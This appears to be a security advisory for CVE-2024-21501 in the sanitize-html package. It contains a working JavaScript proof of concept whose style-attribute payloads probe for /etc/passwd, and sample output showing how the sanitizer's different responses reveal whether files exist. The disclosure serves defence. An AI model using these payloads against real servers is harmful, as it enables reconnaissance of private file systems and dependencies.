sanitize-html — CVE-2024-21501

Affected versions (<2.12.1) of this package are vulnerable to Information Exposure when used on the backend with the style attribute allowed, enabling enumeration of system files including project dependencies. An attacker could exploit this to gather details about the targeted server's file system structure and dependencies.

Proof of Concept

N/AJAVASCRIPT

// index.js
const sanitizeHtml = require('sanitize-html');
 
const file_exist = `<a style='background-image: url("/*# sourceMappingURL=/etc/passwd */");'>@slonser_</a>`;
const file_dont_exist = `<a style='background-image: url("/*# sourceMappingURL=/etc/nopasswd */");'>@slonser_</a>`;
 
// vulnerable sanitize
const sanitize = (input) => sanitizeHtml(input, {
  allowedAttributes: {
    ...sanitizeHtml.defaults.allowedAttributes,
    a: ['style'],
  },
});
 
const sanitized_exist = sanitize(file_exist);
const sanitized_dont_exist = sanitize(file_dont_exist);
 
console.log(sanitized_exist, "<-- response when file is found");
console.log(sanitized_dont_exist, "<-- response when file is not found");

Output

N/ABASH

root@8cf83668943d:~# node index.js 
[... snip ...]
<a>@slonser_</a> <-- response when file is found
<a style="background-image:url(&quot;/*# sourceMappingURL=/etc/nopasswd */&quot;)">@slonser_</a> <-- response when file is not found

The vulnerability allows differentiation between existing and non-existing files based on how the sanitizer processes the CSS, creating a timing or output-based side channel for file enumeration.

██╗ ██████╗ ███████╗██╗███████╗███╗ ██╗██████╗ ██║██╔═══██╗██╔════╝██║██╔════╝████╗ ██║██╔══██╗ ██║██║ ██║█████╗ ██║█████╗ ██╔██╗ ██║██║ ██║ ██║██║ ██║██╔══╝ ██║██╔══╝ ██║╚██╗██║██║ ██║ ██║╚██████╔╝██║ ██║███████╗██║ ╚████║██████╔╝ ╚═╝ ╚═════╝ ╚═╝ ╚═╝╚══════╝╚═╝ ╚═══╝╚═════╝